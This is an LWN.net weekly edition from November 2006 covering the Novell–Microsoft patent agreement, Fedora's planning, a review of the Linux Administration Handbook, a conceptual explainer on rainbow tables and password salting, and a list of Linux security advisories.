LWN.net Logo

LWN.net Weekly Edition for November 9, 2006

On Novell and Microsoft

Depending on who is commenting, the recently announced agreement between Microsoft and Novell is either the ultimate victory or the beginning of the end for Linux. If there is anything that is clear about this new arrangement, it's that nobody really understands what it means yet. Perhaps, in the end, it means less than most people hope or fear.

Parts of the agreement are reasonably easy to understand. Microsoft will now officially recommend SUSE Linux to its customers who are determined to run something other than Windows on some of their machines. Microsoft will also hand out "coupons" for Novell support. A joint "research center" will be set up to work on projects of interest to both companies; virtualization, network management, and document formats are on the list of topics to be addressed. Among other things, this work could result in better support for documents in Microsoft formats, an area of active interest for many years.

The part of the agreement which has attracted the most attention, however, is the patent deal. This is also the hardest part to understand, and its real implications may take years to become clear. These seem to be the relevant points:

  • The two companies have entered into a "covenant not to sue" each others' paying customers for patent violations. So SUSE (but not OpenSUSE) users should be free of the fear of being hauled into court by Microsoft's lawyers, and Windows users need no longer stay awake at nights worrying about a legal attack from Novell.

  • The companies are making patent royalty payments to each other. It appears that the net cash flow is in Novell's direction, because there are more Windows products shipped than SUSE products. But the fact remains: Microsoft has succeeded in collecting a tax on every SUSE Linux distribution supported by Novell.

  • Microsoft has made a promise not to sue individual developers for patent violations - sort of.

The text of the covenant not to sue has been posted. It would appear to cover Novell's paid customers for their particular use of SUSE Linux. It's not clear that the term "use" extends to the ways some of us "use" Linux - distributing it to others, for example. Microsoft can tweak or terminate the agreement at any time "pursuant to the terms of the Patent Cooperation Agreement between Novell and Microsoft that was publicly announced on November 2, 2006"; of course, the terms of that agreement are not publicly available. The agreement is currently slated to end in 2012, however.

To some, this agreement represents a total sell-out of Linux users by Novell. To others, it is simply Novell trying to eliminate a specific source of FUD against its customers. How it will really play out remains to be seen.

Novell insists that it has not licensed any patents from Microsoft - that the "covenant not to sue" is an entirely different thing. It is somewhat hard to believe that a courtroom would come to the same conclusion, especially given the fact that royalty payments are being made. The distinction may become very important to Novell. Many observers have pointed out section 7 of the GNU General Public License:

If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program.

What this text means is that, if Microsoft is asserting patents against GPL-licensed code, Novell cannot distribute that code to its customers just because it has a "license" from Microsoft. There is some suspicion that Novell is trying to use the "covenant not to sue" as a way of weaseling out of this restriction, but it is difficult to imagine such a strategy succeeding. If Novell's customers cannot redistribute Linux, then Novell cannot distribute it to them.

So, should Microsoft ever go after a user of GPL-licensed code, Novell will find itself in a difficult position. Either distribution of the code in question in the lawsuit must be stopped, creating potential problems for Novell's customers, or Novell can continue distribution under its non-license with Microsoft, inviting suits from copyright holders. Either way, a Microsoft patent suit against Linux would not be a comfortable experience for Novell, even with this agreement in place.

Adding to the non-license claim, Novell's Kurt Garloff told LWN:

Like before, Novell does not acknowledge that any software it ships actually does infringe on a patent. As soon as Novell would determine that GPL software is affected by a MS patent, Novell would change the software to avoid/work around being affected by the patent.

This is a clear position which contains all the right words. It is still hard to square the claim that no patents have been acknowledged with the royalty payments, however. If Novell acknowledges no patent infringements, what, exactly, is it paying royalties on? Perhaps it is just naked protection money for its customers. Or, perhaps, this is a concession Novell had to make to obtain the royalty stream from Microsoft.

One of the criticisms of this deal centers on the implicit acknowledgment of patent problems in Linux. Companies pursuing patent shakedowns often use the existence of paying licensees as evidence in their favor. If, however, Novell has in truth not licensed (or obtained "covenants not to sue") on any specific patents, then the value of Novell as evidence, especially in court, will be small.

A separate - and very interesting - question remains: how, exactly, does Novell's "covenant not to sue" affect the patents which Novell donated to the Open Invention Network (OIN)? Those patents are at the core of OIN's deterrent power, and it is the promise of protection from OIN which enabled the inclusion of Mono-based software into the Fedora Core distribution. If Novell's non-license covers those patents, then OIN's credibility as a deterrent to lawsuits by Microsoft will take a large hit. Your editor was unable to get an answer from Novell on this question in this article's time frame (getting answers from lawyers takes time). It would seem, however, from an inexpert reading, that the relevant patents have been truly assigned to OIN, and are no longer Novell's to non-license to anybody. If that reading is correct, then OIN's position is just as strong as it was before.

That question has not been settled, however, and there is a lot of concern in the community. The Fedora Project is actively considering the future of Mono in its distribution - one of many interesting decisions that project will be making in the near future.

Finally, there is the matter of Microsoft's promise not to sue individual developers. Anybody who is interested should just go read the text of the promise. As long as individual developers stay in their own basements and don't try to do anything rash - like distribute their code - they will be safe. For anybody who is trying to actually be a part of the free software development community, however, Microsoft's promise has no value at all. There is no point, even, in getting worked up about the fact that Microsoft reserves the right to change its promise at any time. For individual developers, nothing has changed at all.

In fact, for most of us, nothing has really changed. Software patent suits were a serious threat before, and they are still a serious threat. Some argue that Novell's agreement has made a patent attack from Microsoft more likely (Steve Ballmer's latest FUD is often quoted), but that is not at all clear. It is hard to see Microsoft suing Linux users; those whose pockets are deep enough to make them worth suing are certainly Microsoft customers too. A patent suit against another Linux distributor would leave Novell in a seriously uncomfortable position, and likely shatter this new partnership. The threat is there, certainly, just like it was before.

To your editor's eye, the deal looks like the following. Novell, despite trying to do a lot of the right things, finds itself a distant second in the corporate Linux market. Red Hat has proved hard to beat, and the entry of Oracle into this market - supporting Red Hat's distribution - seems unlikely to help. In this context, the deal with Microsoft must look like it has some real advantages: it might help SUSE Linux to achieve the best interoperability with Microsoft products, bring in a few more sales, provide a new royalty revenue stream, and eliminate a source of FUD which might just, still, be bothering a few potential customers. All of these could help to solidify Novell's position in the market, for a while at least.

So, the claims that Novell has sold out Linux for its own advancement are probably overblown - assuming that OIN retains its power. Most of the community will probably be unaffected, and, if we're really lucky, we might get a bit of code out of the deal. What Novell has done to itself will take longer to work out. Walking into Microsoft's embrace has not always led to long-term joy for the companies involved. On the other hand, some sort of engagement between Microsoft and Linux must happen at some point; it is not as if Microsoft will simply vanish. Novell has taken that step; whether it turns out to be a good thing (for Novell, and for the community) is something we will have to see over time.

Comments (63 posted)

Big decisions loom for Fedora

The Fedora Project is in one of those relatively rare periods where the deadlines have passed, the distribution has been shipped, and no new deadlines have yet been set. Now is the time when participants in the project can engage in a bit of introspection, and that's exactly what is going on. Over the next week or so, decisions will be made which could significantly change the way this project works.

For some background, readers may want to look at this posting from Thorsten Leemhuis and Max Spevack's state of Fedora note. The developers involved with Fedora seem to think that the Fedora Core 6 process went well, and that, as a result, FC6 is a solid distribution. They are justifiably proud of their work. That said, there are a number of issues on the Fedora developers' minds, and a number of changes which, seemingly, need to be made.

To that end, the Fedora Project Board will be meeting on November 7. The real discussion, however, will happen at a special "Fedora Summit" happening from November 11 through the 15th. It is a closed affair, featuring Max Spevack, Greg DeKoenigsberg, Bill Nottingham, Chris Blizzard, Warren Togami, Dave Jones, Jeremy Katz, Jesse Keating, and perhaps various others at times. This group of people will try to make a plan for the development of Fedora Core 7 and the future organization of the project.

Since its inception, Fedora has been criticized for not being as open to the community as its early PR had led people to hope. Much progress has been made in that direction over the last year or so, but much remains to be done. Greg DeKoenigsberg is quite clear that making the project more open is a priority, and that the time has come:

We've got a lot of work to do inside the fenceline, though. Honestly, a lot of that work requires the disentanglement of Fedora and RHEL -- we need the ability to innovate freely in Fedora without adversely impacting RHEL. We didn't really have that opportunity in the FC6 timeframe.

But now we do.

From the resulting discussion, it would appear that one significant decision has already been made, at least in principle: the Fedora Core distribution, as such, will be abolished. Fedora Extras has been sufficiently successful that it increasingly looks like the model for Fedora as a whole in the future. There does not appear to be any dissent to this idea; the hot topic, instead, seems to be how the new distribution will be named. "Fedora Linux" appears to be the leading choice at the moment.

But, then, nobody has really gotten down to discussing - in public, at least - how the new, more open Fedora will work. There will still have to be a decision-making mechanism, a way for setting the goals and priorities for the project. Red Hat is still picking up most of the tab for work on Fedora, so there are still likely to be limits to how much latitude the company is willing to give the project to set its own priorities. A good place to start might be to establish the Fedora Steering Committee - first promised in 2003 - with a significant number of outside contributors and let it provide some direction (in the open) for the project as a whole.

Another topic for the discussion is the future of the Fedora Legacy project, which was discussed here last month. It appears that the project has finally come to see Fedora Legacy - or its absence - as a problem. How that problem will be solved is far from clear at this point, however. Another nagging problem is the ongoing maintenance of rpm; that, too, looks like it may be addressed by the board meeting and the summit.

Then there are issues like the ongoing lack of a Fedora live CD. Desktop support is getting more attention, though it is hard to see how Fedora can address many of the complaints in this area (lack of official Java, flash support, etc.) while remaining true to its "free software only" rules. Making a source code management system available to the wider community remains on the "to do" list. And so on.

In other words, Fedora has a lot of work to do, still, before it becomes a truly open, community project. Nothing illustrates that better than the fact that the directions and priorities for the next Fedora release will be set in closed board and summit meetings. What seems different now is that the project insiders appear more determined than ever to get this work done. For all that Fedora is a great distribution, it needs its community to continue to grow and reach its potential. Given all that needs to be done to become more open to its community, Fedora is likely to still be very much a work in progress by the time the Fedora Linux 7 (or whatever it is called) is released. But, then, that is true of a great many free software projects.

Comments (17 posted)

Review: Linux Administration Handbook, Second Edition

Your editor is often asked if he would be willing to be a technical reviewer for an upcoming Linux-oriented book. Such requests are almost always turned down. Technical review is an important task, but it takes vast amounts of time and the compensation is mostly measured in karma points. It is a hard task to squeeze in. Evi Nemeth, however, earned special consideration many years ago when she allowed LWN's co-founders to do their Data Structures homework on the University of Colorado's lone VAX 11/780 - on [cover] the condition that they learn C. She also let your editor make some "fixes" (long since lost, mercifully) to the memory management system on the early BSD release running on that VAX. So, when Evi and company asked for help reviewing the second edition of the Linux Administration Handbook, your editor agreed to do it.

This was not a trivial task; the Handbook now weighs in at a full 1000 pages. It is derived from the classic Unix Administration Handbook, which was the definitive administration manual for its times. The second iteration is an attempt to bring the book up to date with the current Linux state of the art, an attempt which is not 100% successful. The fact remains, however, that the Linux Administration Handbook remains unmatched for its combination of clear writing, technical depth, and extensive experience in all aspects of system and network management.

A glance through the table of contents shows that some audiences will get more out of the Handbook than others. The chapters on DNS and electronic mail administration are over 100 pages - each. Networking is covered in detail, from how to wire up an RJ-45 connector through Samba administration. Backups, printing, process management, the bootstrap process, and so on are all addressed. There is also a lot of accumulated wisdom on dealing with users, working with vendors, managing system administration groups, tracking problems, etc. If you are charged with managing mostly server-oriented systems, this book has almost everything you need.

The second edition updates the Handbook in a number of ways. Ubuntu "Dapper" and Fedora Core 5 have been added to the list of covered distributions; they join RHEL 4.3, SUSE Linux Enterprise 10.2, and Debian Testing (to be Etch) as of last September. Bacula is now covered in detail (and much of the Amanda discussion has been taken out). The electronic mail chapter - while still centered mostly on sendmail - now has a reasonable section on postfix. The security chapter has been filled out with the latest tools. And so on.

As your editor can well attest, however, bringing a book up to the current state of Linux is a hard task - and it never stays current for long. Still, at times, the Linux Administration Handbook shows its age a little too much. Back in the days of VAXen and early Unix workstations, we all got very good at dealing with serial ports and making terminals talk. But how many of us need a chapter on that subject now? The security chapter passes over SELinux entirely - a major shortcoming. As far as the authors are concerned, udev seems not to exist - it is only mentioned in passing. But how does one manage a contemporary system without an understanding of udev? There's plenty of information on how deeply Ethernet hubs can be cascaded, but wireless networking is passed over almost entirely.

There is also almost no discussion of contemporary desktops. The Handbook authors avoid graphical administration tools in favor of really understanding (and being able to script) the system at a lower level, and this is good. But an administrator in this century should have a sense for how the desktop goes together and how to configure things to give users the experience and capabilities they need. The second edition does add a badly-needed chapter on the X Window System, but it leaves the upper parts of the desktop untouched.

So the second edition of the Linux Administration Handbook is not perfect. But, for a large part of the system administration space, this book has the best combination of "how to do it" (technical details) and "how you should do it" (what works well in the real world). It is still the first place your editor looks when the man page falls short. If your job requires keeping Linux systems running, especially if it's in a larger environment, you probably need this book on your shelf.

Comments (9 posted)

Page editor: Jonathan Corbet

Security

Rainbow tables for password cracking

November 8, 2006

This article was contributed by Jake Edge.

An announcement about a new site offering free 'rainbow tables' on the bugtraq mailing list sparked our interest; what are these tables and what can they be used for? It turns out that rainbow tables are the result of pre-computing various one-way hash functions to facilitate decrypting them. In effect, the right set of tables makes a one-way hash function reversible for certain inputs and the inputs of interest are passwords.

Many applications use one-way hash functions (such as MD5 or SHA1) to store passwords because they hide the password value from prying eyes, but it is easy to compare hashed passwords when a user logs in. This relies on the fact that it is difficult to reverse the hash function and produce the original password, but the application can just apply the hash function to the password presented and compare the output to the stored hash. Operating systems, database management systems, web and other applications often use this method to store their users' passwords.

For those that might want to crack a password, a straightforward, but very time consuming method would be to brute force it. Generate the hashed values for each string in the password search space and compare it to the hashed value of interest; when they match, the password is cracked. If one needed to crack passwords regularly, it might make sense to store the password to hash mappings so that it would just take a lookup to find any previously cracked password. The storage requirements of that kind of table, for any plausible set of potential passwords (say 1-8 alphanumeric characters) are huge. Rainbow tables are a way to reduce the storage requirements substantially while still preserving much of the speed benefits of using a lookup table.

To create a rainbow table, you must first come up with a reduction function that takes a hash as input and maps it to a password in the search space. You then start with a password and repeatedly hash and reduce it several thousand times creating a chain of passwords. You discard all but the first and last password and store that pair. To reverse a particular hash value, you reduce the hash value and look for that password as the end of one of the chains. If you do not find it, then you hash and reduce again. Once you find a matching end of the chain, you use the first password to recreate the chain and the cracked password is the second to last in the chain.

This ingenious scheme comes from a paper presented at the CRYPTO 2003 conference. The paper is a bit dense if you are unfamiliar with the references cited, so the author has a simplified explanation as well.

Rainbow tables are specific to a particular hash algorithm and password search space and that is where the free rainbow tables site comes in handy. There are currently two tables available there, one for MD5 and one for the older Windows DES-based password algorithm. The MD5 version is 36Gb in size and will crack 99.9% of lowercase alphanumeric passwords that are eight characters or less in length. The site also has links to other sites with tables as well as to the Project RainbowCrack site which has source for various programs to generate and use the tables.

The best defense against rainbow tables is 'salt', which has been a part of UNIX passwords since near the beginning of time (UNIX epoch time anyway). Salt is a random string that is added to the password before hashing it and then stored with the password. Linux MD5 passwords store the salt between two dollar signs in the password field in /etc/shadow. This random string effectively multiplies the number of tables required to do a dictionary lookup by the number of individual salt values available. Even just eight bits of salt (and Linux uses much more than that) would require nine terabytes of rainbow table.

While this technique is not particularly effective at recovering OS passwords (at least on Linux), there are quite a number of web applications that store straight MD5 passwords without any salt (and some, sadly, store plaintext passwords). Other applications may do that as well. If the password hashes become exposed via a SQL injection or other flaw, rainbow tables could be just the ticket to breaking into those systems.

Comments (7 posted)

New vulnerabilities

imlib2: arbitrary code execution

Package(s):imlib2 CVE #(s):CVE-2006-4806 CVE-2006-4807 CVE-2006-4808 CVE-2006-4809
Created:November 6, 2006 Updated:August 13, 2007
Description: M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges.
Alerts:
Mandriva MDKSA-2007:156 2007-08-10
Gentoo 200612-20 2006-12-20
Fedora FEDORA-EXTRAS-2006-004 2006-11-09
Mandriva MDKSA-2006:198-1 2006-11-06
Mandriva MDKSA-2006:198 2006-11-06
Ubuntu USN-376-2 2006-11-06
Ubuntu USN-376-1 2006-11-03

Comments (none posted)

ingo1: missing input sanitizing

Package(s):ingo1 CVE #(s):CVE-2006-5449
Created:November 3, 2006 Updated:November 27, 2006
Description: It was discovered that the Ingo email filter rules manager performs insufficient escaping of user-provided data in created procmail rules files, which allows the execution of arbitrary shell commands.
Alerts:
Gentoo 200611-22 2006-11-27
Debian DSA-1204-1 2006-11-02

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4572 CVE-2006-4997
Created:November 6, 2006 Updated:January 17, 2007
Description: Some vulnerabilities were discovered in the Linux 2.6 kernel:

There are possibly exploitable bugs in the netfilter for IPv6 code. (CVE-2006-4572)

The ATM subsystem of the Linux kernel could allow a remote attacker to cause a Denial of Service (panic) via unknown vectors that cause the ATM subsystem to access the memory of socket buffers after they are freed. (CVE-2006-4997)

Alerts:
Red Hat RHSA-2007:0013-01 2007-01-17
Red Hat RHSA-2007:0012-01 2007-01-17
Debian DSA-1237-1 2006-12-17
rPath rPSA-2006-0204-1 2006-11-09
Mandriva MDKSA-2006:197 2006-11-03

Comments (none posted)

libpam-ldap: insecure password control

Package(s):libpam-ldap CVE #(s):CVE-2006-5170
Created:November 3, 2006 Updated:December 21, 2006
Description: Steve Rigler discovered that the PAM module for authentication against LDAP servers processes PasswordPolicyReponse control messages incorrectly, which might lead to an attacker being able to login into a suspended system account.
Alerts:
Gentoo 200612-19 2006-12-20
SuSE SUSE-SR:2006:027 2006-11-24
Red Hat RHSA-2006:0719-01 2006-11-15
Mandriva MDKSA-2006:201 2006-11-07
Trustix TSLSA-2006-0061 2006-11-03
Debian DSA-1203-1 2006-11-02

Comments (none posted)

libX11: file descriptor leak

Package(s):libX11 CVE #(s):CVE-2006-5397
Created:November 7, 2006 Updated:November 8, 2006
Description: The Xinput module (modules/im/ximcp/imLcIm.c) in X.Org libX11 1.0.2 and 1.0.3 opens a file for reading twice using the same file descriptor, which causes a file descriptor leak that allows local users to read files specified by the XCOMPOSEFILE environment variable via the duplicate file descriptor.
Alerts:
Mandriva MDKSA-2006:199 2006-11-06

Comments (1 posted)

Mozilla products: multiple vulnerabilities

Package(s):thunderbird firefox seamonkey CVE #(s):CVE-2006-5463 CVE-2006-5747 CVE-2006-5748 CVE-2006-5464
Created:November 8, 2006 Updated:December 11, 2006
Description: Numerous vulnerabilities have been found in the Mozilla JavaScript and HTML rendering code, leading to possible remote code execution attacks. This CERT advisory contains details.
Alerts:
Gentoo 200612-08 2006-12-10
Gentoo 200612-07 2006-12-10
Gentoo 200612-06 2006-12-10
Debian DSA-1227-1 2006-12-04
Debian DSA-1225-2 2006-12-03
Debian DSA-1225-1 2006-12-03
Debian DSA-1224-1 2006-12-03
Ubuntu USN-381-1 2006-11-16
Ubuntu USN-382-1 2006-11-16
SuSE SUSE-SA:2006:068 2006-11-16
Slackware SSA:2006-313-01 2006-11-10
rPath rPSA-2006-0206-1 2006-11-09
Mandriva MDKSA-2006:206 2006-11-09
Mandriva MDKSA-2006:205 2006-11-09
Fedora FEDORA-2006-1199 2006-11-08
Red Hat RHSA-2006:0735-01 2006-11-08
Red Hat RHSA-2006:0734-01 2006-11-08
Red Hat RHSA-2006:0733-02 2006-11-08
Fedora FEDORA-2006-1194 2006-11-08
Fedora FEDORA-2006-1192 2006-11-08
Fedora FEDORA-2006-1191 2006-11-08
Fedora FEDORA-2006-1191 2006-11-08

Comments (none posted)

openssh: privilege separation issue

Package(s):openssh CVE #(s):CVE-2006-5794
Created:November 8, 2006 Updated:April 5, 2007
Description: From the OpenSSH 4.5 announcement: "Fix a bug in the sshd privilege separation monitor that weakened its verification of successful authentication. This bug is not known to be exploitable in the absence of additional vulnerabilities."
Alerts:
Fedora FEDORA-2007-395 2007-04-03
Fedora FEDORA-2006-1215 2006-11-20
Fedora FEDORA-2006-1214 2006-11-20
SuSE SUSE-SR:2006:026 2006-11-17
Trustix TSLSA-2006-0063 2006-11-15
Red Hat RHSA-2006:0738-01 2006-11-15
rPath rPSA-2006-0207-1 2006-11-09
Mandriva MDKSA-2006:204 2006-11-08
OpenPKG OpenPKG-SA-2006.032 2006-11-08

Comments (none posted)

php: buffer overflows

Package(s):php CVE #(s):CVE-2006-5465
Created:November 3, 2006 Updated:January 18, 2010
Description: The Hardened-PHP Project discovered buffer overflows in htmlentities/htmlspecialchars internal routines to the PHP Project. Of course the whole purpose of these functions is to be filled with user input. (The overflow can only be when UTF-8 is used)
Alerts:
Mandriva MDVSA-2010:007 2010-01-15
SuSE SUSE-SA:2006:067 2006-11-15
rPath rPSA-2006-0205-1 2006-11-09
Red Hat RHSA-2006:0731-01 2006-11-10
Red Hat RHSA-2006:0730-01 2006-11-06
Debian DSA-1206-1 2006-11-06
Fedora FEDORA-2006-1169 2006-11-06
Fedora FEDORA-2006-1168 2006-11-06
Slackware SSA:2006-307-01 2006-11-06
OpenPKG OpenPKG-SA-2006.028 2006-11-06
Ubuntu USN-375-1 2006-11-02
Mandriva MDKSA-2006:196 2006-11-02

Comments (none posted)

postgresql: several vulnerabilities

Package(s):postgresql-8.1 CVE #(s):CVE-2006-5540 CVE-2006-5541 CVE-2006-5542
Created:November 3, 2006 Updated:November 8, 2006
Description: Michael Fuhr discovered an incorrect type check when handling unknown literals. By attempting to coerce such a literal to the ANYARRAY type, a local authenticated attacker could cause a server crash. (CVE-2006-5541)

Josh Drake and Alvaro Herrera reported a crash when using aggregate functions in UPDATE statements. A local authenticated attacker could exploit this to crash the server backend. This update disables this construct, since it is not very well defined and forbidden by the SQL standard. (CVE-2006-5540)

Sergey Koposov discovered a flaw in the duration logging. This could cause a server crash under certain circumstances. (CVE-2006-5542)

Alerts:
Ubuntu USN-369-2 2006-11-01

Comments (none posted)

rpm: arbitrary code execution

Package(s):rpm CVE #(s):CVE-2006-5466
Created:November 6, 2006 Updated:August 28, 2007
Description: An error was found in the RPM library's handling of query reports. In some locales, certain RPM packages would cause the library to crash. If a user was tricked into querying a specially crafted RPM package, the flaw could be exploited to execute arbitrary code with the user's privileges.
Alerts:
Fedora FEDORA-2007-668 2007-08-27
Gentoo 200611-08 2006-11-13
Mandriva MDKSA-2006:200 2006-11-07
Ubuntu USN-378-1 2006-11-04

Comments (none posted)

texinfo: buffer overflow

Package(s):texinfo CVE #(s):CVE-2006-4810
Created:November 8, 2006 Updated:November 27, 2006
Description: Texinfo contains a buffer overflow which could be exploited (via a specially-crafted info file) to run arbitrary code.
Alerts:
rPath rPSA-2006-0219-1 2006-11-27
Debian DSA-1219-1 2006-11-27
Gentoo 200611-16 2006-11-21
OpenPKG OpenPKG-SA-2006.034 2006-11-15
Ubuntu USN-379-1 2006-11-09
Fedora FEDORA-2006-1203 2006-11-09
Fedora FEDORA-2006-1202 2006-11-09
Red Hat RHSA-2006:0727-01 2006-11-08
Mandriva MDKSA-2006:203 2006-11-08

Comments (none posted)

thttpd: insecure temporary files

Package(s):thttpd CVE #(s):CVE-2006-4248
Created:November 3, 2006 Updated:December 1, 2006
Description: Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack.
Alerts:
Debian DSA-1205-2 2006-12-01
Debian DSA-1205-1 2006-11-02

Comments (none posted)

wireshark: multiple vulnerabilities

Package(s):wireshark ethereal CVE #(s):CVE-2006-4574 CVE-2006-4805 CVE-2006-5468 CVE-2006-5469 CVE-2006-5740
Created:November 3, 2006 Updated:November 14, 2006
Description: There are multiple vulnerabilities in Wireshark (formerly Ethereal):
  • Off-by-one error in the MIME Multipart dissector in Wireshark 0.10.1 through 0.99.3 allows remote attackers to cause a denial of service (crash) via certain vectors that trigger an assertion error related to unexpected length values. CVE-2006-4574
  • epan/dissectors/packet-xot.c in the XOT dissector (dissect_xot_pdu) in Wireshark 0.9.8 through 0.99.3 allows remote attackers to cause a denial of service (memory consumption and crash) via an encoded XOT packet that produces a zero length value when it is decoded. CVE-2006-4805
  • Unspecified vulnerability in the HTTP dissector in Wireshark 0.99.3 allows remote attackers to cause a denial of service (crash) via unspecified vectors. CVE-2006-5468
  • Unspecified vulnerability in the WBXML dissector in Wireshark 0.10.11 through 0.99.3 allows remote attackers to cause a denial of service (crash) via certain vectors that trigger a null dereference. CVE-2006-5469
  • Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.3 allows remote attackers to cause a denial of service (crash) via a crafted LDAP packet. CVE-2006-5740
Alerts:
SuSE SUSE-SA:2006:065 2006-11-14
Red Hat RHSA-2006:0726-01 2006-11-09
Mandriva MDKSA-2006:195 2006-11-02
Debian DSA-1201-1 2006-10-31
rPath rPSA-2006-0202-1 2006-11-01
Fedora FEDORA-2006-1140 2006-11-01
Fedora FEDORA-2006-1141 2006-11-01

Comments (none posted)

wv: integer overflow

Package(s):wv CVE #(s):CVE-2006-4513
Created:November 2, 2006 Updated:December 7, 2006
Description: The wv library has an integer overflow vulnerability in the DOC file parser. If a user can be tricked into opening a maliciously crafted MSWord file, a remote attacker can execute arbitrary code with the privileges of the user.
Alerts:
Gentoo 200612-01 2006-12-07
Mandriva MDKSA-2006:202 2006-11-07
Ubuntu USN-374-1 2006-11-01

Comments (none posted)

Updated vulnerabilities

apache: cross-site scripting

Package(s):apache CVE #(s):CVE-2006-3918
Created:August 9, 2006 Updated:April 4, 2008
Description: From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header."
Alerts:
SuSE SUSE-SA:2008:021 2008-04-04
Ubuntu USN-575-1 2008-02-04
SuSE SUSE-SA:2006:051 2006-09-08
Debian DSA-1167-1 2005-09-04
Red Hat RHSA-2006:0619-01 2006-08-10
Red Hat RHSA-2006:0618-01 2006-08-08

Comments (none posted)

asterisk: arbitrary code execution

Package(s):asterisk CVE #(s):CVE-2006-5444
Created:October 19, 2006 Updated:December 6, 2006
Description: The Asterisk telephony PBX application has a heap overflow vulnerability in the skinny channel driver. A remote attacker can use this to arbitrarily execute code with the privileges of the Asterisk user. See this vulnerability report for more information.
Alerts:
Debian DSA-1229-1 2006-12-06
SuSE SUSE-SA:2006:069 2006-11-16
Gentoo 200610-15 2006-10-30
OpenPKG OpenPKG-SA-2006.024 2006-10-19

Comments (none posted)

bind: denial of service

Package(s):bind CVE #(s):CVE-2006-4095 CVE-2006-4096
Created:September 7, 2006 Updated:February 1, 2007
Description: Bind has two denial of service vulnerabilities.

Recursive servers queries for SIG records will trigger an assertion failure if more than one RR set is returned.

An INSIST failure can be triggered by sending a large number of recursive queries.

Alerts:
Fedora FEDORA-2007-164 2007-01-31
Gentoo 200609-11 2006-09-15
Slackware SSA:2006-257-01 2006-09-15
Fedora FEDORA-2006-966 2006-09-11
Debian DSA-1172-1 2006-09-09
Mandriva MDKSA-2006:163 2006-09-08
rPath rPSA-2006-0166-1 2006-09-08
Ubuntu USN-343-1 2006-09-07
OpenPKG OpenPKG-SA-2006.019 2006-09-07

Comments (none posted)

busybox: insecure password generation

Package(s):busybox CVE #(s):CVE-2006-1058
Created:May 5, 2006 Updated:May 2, 2007
Description: The BusyBox 1.1.1 passwd command does not use a proper salt when generating passwords. This would create an instance where a brute force attack could take very little time.
Alerts:
Red Hat RHSA-2007:0244-02 2007-05-01
Fedora FEDORA-2006-511 2006-05-04
Fedora FEDORA-2006-510 2006-05-04

Comments (2 posted)

bzip2: race condition and infinite loop

Package(s):bzip2 CVE #(s):CAN-2005-0953 CAN-2005-1260
Created:May 17, 2005 Updated:January 10, 2007
Description: A race condition in bzip2 1.0.2 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by bzip2 after the decompression is complete. Also specially crafted bzip2 archives may cause an infinite loop in the decompressor.
Alerts:
rPath rPSA-2007-0004-1 2007-01-09
Debian DSA-741-1 2005-07-07
Red Hat RHSA-2005:474-01 2005-06-16
OpenPKG OpenPKG-SA-2005.008 2005-06-10
SuSE SUSE-SR:2005:015 2005-06-07
Debian DSA-730-1 2005-05-27
Mandriva MDKSA-2005:091 2005-05-18
Ubuntu USN-127-1 2005-05-17

Comments (2 posted)

cpio: arbitrary code execution

Package(s):cpio CVE #(s):CVE-2005-4268
Created:January 2, 2006 Updated:March 17, 2010
Description: Richard Harms discovered that cpio did not sufficiently validate file properties when creating archives. Files with e. g. a very large size caused a buffer overflow. By tricking a user or an automatic backup system into putting a specially crafted file into a cpio archive, a local attacker could probably exploit this to execute arbitrary code with the privileges of the target user (which is likely root in an automatic backup system).
Alerts:
CentOS CESA-2010:0145 2010-03-17
Red Hat RHSA-2010:0145-01 2010-03-15
rPath rPSA-2007-0094-1 2007-05-07
Red Hat RHSA-2007:0245-02 2007-05-01
Ubuntu USN-234-1 2006-01-02

Comments (none posted)

vixie-cron: privilege escalation

Package(s):cron CVE #(s):CVE-2006-2607
Created:May 31, 2006 Updated:June 1, 2009
Description: The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root.
Alerts:
Ubuntu USN-778-1 2009-06-01
Red Hat RHSA-2006:0539-01 2006-07-12
Gentoo 200606-07 2006-06-09
SuSE SUSE-SA:2006:027 2006-05-31
rPath rPSA-2006-0082-1 2006-05-25

Comments (1 posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2006-4262
Created:October 2, 2006 Updated:June 16, 2009
Description: Will Drewry of the Google Security Team discovered several buffer overflows in cscope, a source browsing tool, which might lead to the execution of arbitrary code.
Alerts:
CentOS CESA-2009:1101 2009-06-16
Red Hat RHSA-2009:1101-01 2009-06-15
Gentoo 200610-08 2006-10-20
Debian DSA-1186-1 2006-09-30

Comments (none posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2004-2541
Created:May 22, 2006 Updated:June 19, 2009
Description: A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows remote attackers to execute arbitrary code via a C file with a long #include line that is later browsed by the target.
Alerts:
CentOS CESA-2009:1102 2009-06-19
CentOS CESA-2009:1101 2009-06-16
Red Hat RHSA-2009:1102-01 2009-06-15
Red Hat RHSA-2009:1101-01 2009-06-15
Gentoo 200606-10 2006-06-11
Debian DSA-1064-1 2006-05-19

Comments (1 posted)

Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service

Package(s):cyrus-sasl CVE #(s):CVE-2006-1721
Created:April 21, 2006 Updated:September 4, 2007
Description: Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5 process that could lead to a Denial of Service. An attacker could possibly exploit this vulnerability by sending specially crafted data stream to the Cyrus-SASL server, resulting in a Denial of Service even if the attacker is not able to authenticate.
Alerts:
Red Hat RHSA-2007:0878-01 2007-09-04
Red Hat RHSA-2007:0795-01 2007-09-04
SuSE SUSE-SA:2006:025 2006-05-05
Fedora FEDORA-2006-515 2006-05-04
Debian DSA-1042-1 2006-04-25
